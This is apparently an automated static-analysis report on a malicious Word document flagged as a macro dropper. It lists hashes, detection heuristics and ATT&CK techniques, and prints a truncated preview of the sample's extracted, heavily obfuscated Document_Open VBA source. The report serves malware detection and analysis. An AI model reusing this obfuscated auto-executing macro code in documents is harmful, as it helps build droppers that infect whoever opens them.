Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a1094ef31630fce1…

MALICIOUS

Office (OLE)

284.0 KB Created: 2017-10-10 19:25:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: c06ec21287c45c940b470cf2f51f61c0 SHA-1: aa0b134c5ae98ce5b5e70629bfcc189e9a312e26 SHA-256: a1094ef31630fce1db8d3eb8c0505256f2e0a3a6371971d38a9b38039822c65e
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function for execution. This indicates an attempt to run external code, likely a downloader for a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6344763-0' further supports its malicious nature as a dropper.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6344763-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6344763-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 82922 bytes
SHA-256: 6c03227413725a4333f3292ac08e4cc8ddbef27624e27300abe82bdfa2e9596d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
L64JVi83 = "V6upEIBH"
L64JVi83 = LTrim(Mid(L64JVi83, -1643 + 1654, -1643 + 1654))
JCVAJY6 = "poGiJOL"
If Len(JCVAJY6) > 156 Then
sBpku = "jKg4A"
MsgBox sBpku, 63, "RhfdS"
End If
Tf2sFa = "oI1RV"
If Len(Tf2sFa) > 156 Then
YaxTIDuhl = "pOUc9KF6"
MsgBox YaxTIDuhl, 63, "vLj4B8ncS"
End If
Vpr83DbwT = "jQ6xpZhuk"
Vpr83DbwT = Trim(Mid(Vpr83DbwT, -1632 + 1642, -1632 + 1642))
MnSQNCVu = "WTgQwOuB"
If Len(MnSQNCVu) > 173 Then
B8zWQovN = "AxIwLKA"
MsgBox B8zWQovN, 58, "foCES"
End If
Rktq5O76 = "YV5ty"
Rktq5O76 = LTrim(Mid(Rktq5O76, -1632 + 1642, -1632 + 1642))
lNYMIF = "51GJo"
ad5b0gu4V = "UGbpZ"
AeYlxs3P = "gQsDb"
AeYlxs3P = Trim(Mid(AeYlxs3P, -2717 + 2727, -2717 + 2727))
D3JbZ = "IpwsUM"
D3JbZ = RTrim(Mid(D3JbZ, -2717 + 2727, -2717 + 2727))
RER5ueVlv = "eXqh3M9d1"
RER5ueVlv = Trim(Mid(RER5ueVlv, -2309 + 2314, -2309 + 2314))
xEC2uS1I = "Qoh8pfId"
xEC2uS1I = Trim(Mid(xEC2uS1I, -2309 + 2314, -2309 + 2314))
ZQJzKTt = "walb0"
ZQJzKTt = RTrim(Mid(ZQJzKTt, -2309 + 2314, -2309 + 2314))
Dim IlyCB53D
IlyCB53D = lNYMIF & ad5b0gu4V
LMjk1emG = "hp2Ls5m"
I30q9nyT = "Lhh"
qMtb9ay = "Pl3rsYVP"
qMtb9ay = Trim(Mid(qMtb9ay, -1635 + 1641, -1635 + 1641))
Slt913j = "QcuqCw1Z"
If Len(Slt913j) > 233 Then
dW2lLg = "Irbsayk"
MsgBox dW2lLg, 62, "R2mYUKkE"
End If
NhJGz = "nkyeZfI"
NhJGz = Trim(Mid(NhJGz, -1635 + 1641, -1635 + 1641))
YAC8N4q6T = "p3SIN"
YAC8N4q6T = RTrim(Mid(YAC8N4q6T, 26493 - 26492, 26493 - 26492))
ivmElgqnR = "u2N3PKs7C"
ivmElgqnR = LTrim(Mid(ivmElgqnR, 26493 - 26492, 26493 - 26492))
sLjoD = "dq9wR2"
If Len(sLjoD) > 175 Then
ahRHlB = "nAtCZl4"
MsgBox ahRHlB, 62, "r9DYZ"
End If
I2LpPClf = "QoWqY"
I2LpPClf = RTrim(Mid(I2LpPClf, 13656 / 13656, 13656 / 13656))
Dim yeE0j9ug
yeE0j9ug = LMjk1emG & I30q9nyT
ylteANh = "WYlJ3bmtz"
fOL8mS6kp = "J"
ZtfqP = "aowxIJ"
If Len(ZtfqP) > 254 Then
GthXxTJ6 = "X7pHLZBvt"
MsgBox GthXxTJ6, 27, "oMITo8"
End If
b7XVPJ5Hp = "v5OPxyd"
If Len(b7XVPJ5Hp) > 254 Then
pfgauje = "EvlnmoHzK"
MsgBox pfgauje, 27, "SjuwbdI"
End If
eogyB = "w9trPNVM"
eogyB = LTrim(Mid(eogyB, -5058 + 5061, -5058 + 5061))
WHsW7m = "IGOsM"
WHsW7m = LTrim(Mid(WHsW7m, -5058 + 5061, -5058 + 5061))
C0WU1OCaT = "IGw5Be"
If Len(C0WU1OCaT) > 176 Then
KL0BM = "zeHE7Q"
MsgBox KL0BM, 24, "Y4Mhkmq"
End If
CcNowsvL = "R09P2k"
CcNowsvL = Trim(Mid(CcNowsvL, -5058 + 5061, -5058 + 5061))
Dim V64u1
V64u1 = ylteANh & fOL8mS6kp
qNlYWB = "yVXetRCKo"
i81Di3Qm = Chr(78)
RIWi4NKR = "MVx7KjZh0"
If Len(RIWi4NKR) > 161 Then
E5oLT79mn = "OdIjXqx"
MsgBox E5oLT79mn, 53, "CeT3Qvy"
End If
glb7RzX = "LANut"
glb7RzX = Trim(Mid(glb7RzX, 2693 - 2681, 2693 - 2681))
PWLKXzeh8 = "czqV0"
If Len(PWLKXzeh8) > 230 Then
mcue3M17 = "jDke5gi"
MsgBox mcue3M17, 3, "L2MFKa5E"
End If
ENgym = "aDH4e"
ENgym = LTrim(Mid(ENgym, 1547 - 1531, 1547 - 1531))
yJYkbjRS = "NvuL5HsZ"
yJYkbjRS = RTrim(Mid(yJYkbjRS, 1547 - 1531, 1547 - 1531))
Dim TPtm3fla
TPtm3fla = qNlYWB & i81Di3Qm
y13H7ys = "E5"
mnPNIXU = "CduVWas"
xN5Vu = "N"
eO0lu = "El0kv"
If Len(eO0lu) > 151 Then
Wd98Agi0G = "f4iYPD1"
MsgBox Wd98Agi0G, 13, "DYs79dfCE"
End If
wDL2KXTI = "OQxjNof"
wDL2KXTI = Trim(Mid(wDL2KXTI, 26377 / 2029, 26377 / 2029))
zSAMVQlB = "fgSfZ0W1a"
If Len(zSAMVQlB) > 212 Then
BsIUZlJ = "xbs48xzG"
MsgBox BsIUZlJ, 52, "uqzdvaEly"
End If
oHP9NBYa = "n5fidZ3Ol"
If Len(oHP9NBYa) > 212 Then
EBAjVC = "otolGgH4r"
MsgBox EBAjVC, 52, "q9FaUj"
End If
CvWwxQ = "jWDwn7ut0"
CvWwxQ = LTrim(Mid(CvWwxQ, 8996 / 692, 8996 / 692))
WpEJf = "KiPCV4Koz"
WpEJf = RTrim(Mid(WpEJf, 8996 / 692, 8996 / 692))
zz3tDlVh9 = "j2fpjX"
zz3tDlVh9 = RTrim(Mid(zz3tDlVh9, 8996 / 692, 8996 / 692))
TEY6wi = "TJQ6lYVbZ"
TEY6wi = RTrim(Mid(TEY6wi, 24714 / 8238, 24714 / 8238))
x4Vv2 = "NFXW6u"
x4Vv2 = LTrim(Mid(x4Vv2, 24714 / 8238, 247
... (truncated)